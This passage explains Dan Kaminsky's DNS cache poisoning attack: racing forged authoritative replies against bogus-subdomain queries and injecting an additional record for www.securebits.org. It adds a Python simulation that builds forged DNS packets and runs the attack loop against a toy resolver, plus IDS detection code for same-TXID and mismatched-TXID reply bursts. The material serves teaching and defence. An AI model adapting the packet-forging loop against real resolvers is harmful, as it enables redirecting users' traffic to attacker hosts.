…Continuation of the previous entry…
Dan's Discovery
Although the attack discovered by Dan Kaminsky is still a form of DNS cache poisoning, it has a feature earlier poisoning attacks lacked: it exploits how resolvers handle the extra records carried in a reply, and it succeeds even when the cache already holds the entry (hostname and IP) the attacker wants to replace. Earlier attacks had to wait for the existing record's TTL to expire; here, if the cache contains www.securebits.org -> 65.65.65.65, the attacker can overwrite it without waiting.
The attack works as follows. The attacker sends a large number of DNS queries to the resolver he wants to poison and, immediately after each query, a forged reply. The queries ask for names that do not exist under the target domain (for example 00001.securebits.org, 00002.securebits.org, 00003.securebits.org, and so on). Since these names are not in the cache and the resolver is not authoritative for securebits.org, it must resolve each one recursively; the server that gives the final answer is normally the authoritative name server for securebits.org, that is, ns.securebits.org. Every query therefore opens a fresh race between the attacker's forged reply and the genuine one.
The forged replies sent alongside the queries carry the spoofed source IP address of ns.securebits.org, and in this description they all carry the same TXID: because the resolver picks a fresh random TXID for every query, a fixed guess is as likely to hit as any other, so the tool need not vary it. The destination UDP port of each forged reply must also match the source port the resolver used for its own query. If the resolver uses a fixed source port for outgoing queries, the attacker learns it once at the start by querying a name under a domain he controls and watching which port the resolver's query arrives from; that port is then used as the destination port of every forged reply. The only remaining unknown is the 16-bit TXID, so each forged reply has a 1 in 65,536 chance of being accepted. On average tens of thousands of query/reply pairs are needed before one guess hits, which takes seconds on a fast link; when it does, the cache is poisoned.
At this point the cache holds a record for a non-existent name such as 12345.securebits.org, which by itself is of little use. Since the attacker is really interested in setting the record for www.securebits.org, the forged reply is made more sophisticated: besides answering the bogus name, it carries an additional Resource Record (RR) stating that www.securebits.org is at 33.33.33.33. Because that name lies inside securebits.org, the zone the apparent sender is authoritative for, the resolver accepts the extra record and installs it in its cache, replacing whatever it already had for www.securebits.org.
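The race described above, as an added simulation (not the page's tool and not Securebits' code): a toy resolver with a fixed source port and random 16-bit TXIDs, a forged authoritative reply that carries the additional www.securebits.org record, and the attacker loop that triggers a lookup of a fresh bogus name and then fires forged replies before the genuine NXDOMAIN arrives. The page describes one forged reply per query; this example sends a configurable burst of distinct TXID guesses per query, which simply multiplies the per-query hit probability by the burst size. The address of ns.securebits.org, the resolver's port, the 33.33.33.34 answer for the bogus name and the seeds are assumed values.

```python
"""Simulation of the multiple-race poisoning described above (added example; not the
page's or Securebits' tool). Names, addresses, port and seeds are assumed values."""
import random
import struct

ZONE = "securebits.org."
AUTH_NS_IP = "65.65.65.1"            # assumed address of ns.securebits.org
VICTIM_NAME = "www.securebits.org."
ATTACKER_IP = "33.33.33.33"

def encode_name(name):
    """Wire-format name, no compression: length-prefixed labels ending in a zero byte."""
    out = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split("."))
    return out + b"\x00"

def decode_name(pkt, off):
    labels = []
    while pkt[off]:
        n = pkt[off]
        labels.append(pkt[off + 1:off + 1 + n].decode())
        off += 1 + n
    return ".".join(labels) + ".", off + 1

def txid_of(pkt):
    return struct.unpack("!H", pkt[:2])[0]

def build_query(txid, qname):
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)        # RD=1, one question
    return header + encode_name(qname) + struct.pack("!HH", 1, 1)    # type A, class IN

def build_reply(txid, qname, rcode=0, answers=(), additional=()):
    """Authoritative reply (QR=1, AA=1) with A records in the answer and additional sections."""
    header = struct.pack("!HHHHHH", txid, 0x8400 | rcode, 1, len(answers), 0, len(additional))
    body = encode_name(qname) + struct.pack("!HH", 1, 1)
    for name, ip in list(answers) + list(additional):
        rdata = bytes(int(o) for o in ip.split("."))
        body += encode_name(name) + struct.pack("!HHIH", 1, 1, 3600, 4) + rdata
    return header + body

def parse_reply(pkt):
    txid, flags, _qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    qname, off = decode_name(pkt, 12)
    off += 4                                                   # skip qtype, qclass
    rrs = []
    for _ in range(an + ns + ar):
        name, off = decode_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            rrs.append((name, ".".join(str(b) for b in pkt[off:off + 4])))
        off += rdlen
    return {"txid": txid, "qr": bool(flags & 0x8000), "qname": qname, "rrs": rrs}

class FixedPortResolver:
    """Toy recursive resolver with the weakness the attack needs: a fixed source port,
    so the 16-bit TXID is the only thing a forger has to guess."""
    def __init__(self, seed, src_port=53):
        self.rng, self.src_port, self.cache, self.pending = random.Random(seed), src_port, {}, {}

    def send_query(self, qname, server_ip=AUTH_NS_IP):
        txid = self.rng.getrandbits(16)
        self.pending[txid] = (qname, server_ip)
        return self.src_port, build_query(txid, qname)

    def receive(self, src_ip, dst_port, pkt):
        """Accept a reply only if port, TXID, source address and question all match."""
        r = parse_reply(pkt)
        if not r["qr"] or dst_port != self.src_port or r["txid"] not in self.pending:
            return False
        qname, server_ip = self.pending[r["txid"]]
        if src_ip != server_ip or r["qname"] != qname:
            return False
        del self.pending[r["txid"]]          # first matching reply wins; later ones are dropped
        for name, ip in r["rrs"]:            # bailiwick check: only names inside the zone
            if name.endswith("." + ZONE):
                self.cache[name] = ip        # overwrites an existing entry, TTL or not
        return True

def poison(resolver, guesses_per_query, max_queries, attacker_rng):
    """Trigger a lookup of a fresh bogus name, flood forged replies before the genuine
    answer can arrive, repeat. Returns the number of queries needed, or None."""
    for i in range(1, max_queries + 1):
        qname = f"{i:05d}.{ZONE}"
        port, query = resolver.send_query(qname)
        for guess in attacker_rng.sample(range(65536), guesses_per_query):
            forged = build_reply(guess, qname, answers=[(qname, "33.33.33.34")],
                                 additional=[(VICTIM_NAME, ATTACKER_IP)])
            if resolver.receive(AUTH_NS_IP, port, forged):      # spoofed source address
                return i
        # the genuine NXDOMAIN (the real server read the TXID from the query) arrives late
        resolver.receive(AUTH_NS_IP, port, build_reply(txid_of(query), qname, rcode=3))
    return None

def run_demo(resolver_seed=7, attacker_seed=1, guesses_per_query=64):
    resolver = FixedPortResolver(resolver_seed)
    resolver.cache[VICTIM_NAME] = "65.65.65.65"            # legitimate record already cached
    queries = poison(resolver, guesses_per_query, 100_000, random.Random(attacker_seed))
    return {"queries": queries, "victim_record": resolver.cache.get(VICTIM_NAME)}

if __name__ == "__main__":
    print(run_demo())
```

Running it shows the cached www.securebits.org record replaced by 33.33.33.33 after roughly a thousand queries with a burst of 64 guesses each; with one guess per query, as the text describes, the same loop needs on the order of 65,536 queries. Setting the resolver's source port to a random value per query (the vendors' fix) would add a second unknown to the `receive` check and push the search space to about 2^32.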
A few notes to bear in mind:
- The attack works regardless of whether the cache already contains a record for the name the attacker wants to inject; the TTL of the existing record offers no protection.
- Almost all DNS servers could be attacked and poisoned this way. Even with the patches released by vendors, which randomize the source port of outgoing queries so that the attacker has to guess both the port and the TXID, the attack is slowed down rather than eliminated: it can take a couple of hours instead of a couple of seconds.
- To detect or block this attack with an IDS/IPS, a usable signature is a burst of DNS reply packets from the same source IP address that all carry the same TXID. A tool that varies the TXID in every forged reply defeats that particular signature; a more general indicator is a burst of replies whose TXIDs match no query the resolver currently has outstanding, since every losing guess in the race produces exactly such a reply.
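The signature from the last note, together with the more general mismatched-TXID indicator, as added detection logic run over constructed traffic (example code, not the page's; the addresses, thresholds and the records themselves are invented). Each record is (source IP, destination IP, DNS payload) as seen on UDP/53 within one time window; the detector only reads the 12-byte header.

```python
"""Detector for the race described above, run over constructed UDP/53 records (added
example, not the page's; addresses, thresholds and the traffic itself are made up)."""
import struct
from collections import Counter

RESOLVER = "10.0.0.53"      # assumed resolver under attack
AUTH_NS = "65.65.65.1"      # assumed address of ns.securebits.org, also spoofed by the attacker
BENIGN_NS = "192.0.2.10"    # some unrelated authoritative server

def dns_header(txid, is_reply):
    """12-byte DNS header with the QR bit set for replies; all the detector needs."""
    return struct.pack("!HHHHHH", txid, 0x8000 if is_reply else 0x0100, 1, 0, 0, 0)

def detect(records, same_txid_threshold=20, mismatch_threshold=20):
    """Rule 1 (the signature from the notes): many replies from one source with one TXID.
    Rule 2 (broader): many replies from one source that answer no outstanding query."""
    outstanding = set()        # (client, server, txid) of queries not yet answered
    same_txid = Counter()      # (server, client, txid) -> number of replies seen
    mismatched = Counter()     # (server, client) -> replies matching no outstanding query
    for src, dst, payload in records:
        txid, flags = struct.unpack("!HH", payload[:4])
        if not flags & 0x8000:                   # QR=0: query from client src to server dst
            outstanding.add((src, dst, txid))
            continue
        same_txid[(src, dst, txid)] += 1
        key = (dst, src, txid)                   # the query this reply claims to answer
        if key in outstanding:
            outstanding.discard(key)             # first matching reply consumes the query
        else:
            mismatched[(src, dst)] += 1
    alerts = []
    for (src, dst, txid), n in same_txid.items():
        if n >= same_txid_threshold:
            alerts.append(("same-txid-flood", src, dst, {"txid": txid, "replies": n}))
    for (src, dst), n in mismatched.items():
        if n >= mismatch_threshold:
            alerts.append(("mismatched-txid-replies", src, dst, {"replies": n}))
    return alerts

def sample_traffic(attack=True, vary_txid=False):
    """Constructed capture: benign lookups, optionally followed by the race. Each attack
    round is one resolver query, one forged reply, then the genuine NXDOMAIN reply."""
    records = []
    for i in range(30):
        records.append((RESOLVER, BENIGN_NS, dns_header(1000 + i, False)))
        records.append((BENIGN_NS, RESOLVER, dns_header(1000 + i, True)))
    if attack:
        for i in range(200):
            real = 5000 + i                                   # TXID the resolver chose
            guess = (0x1234 + i) % 65536 if vary_txid else 0x1234
            records.append((RESOLVER, AUTH_NS, dns_header(real, False)))
            records.append((AUTH_NS, RESOLVER, dns_header(guess, True)))   # forged, arrives first
            records.append((AUTH_NS, RESOLVER, dns_header(real, True)))    # genuine, arrives late
    return records

if __name__ == "__main__":
    for vary in (False, True):
        print("vary_txid=%s:" % vary, detect(sample_traffic(vary_txid=vary)))
```

With a fixed TXID both rules fire; with a varying TXID only the mismatched-reply rule does, which is why the second rule is the one worth deploying. Thresholds should be tuned per window size, since a single genuine retransmission can also produce an unmatched reply.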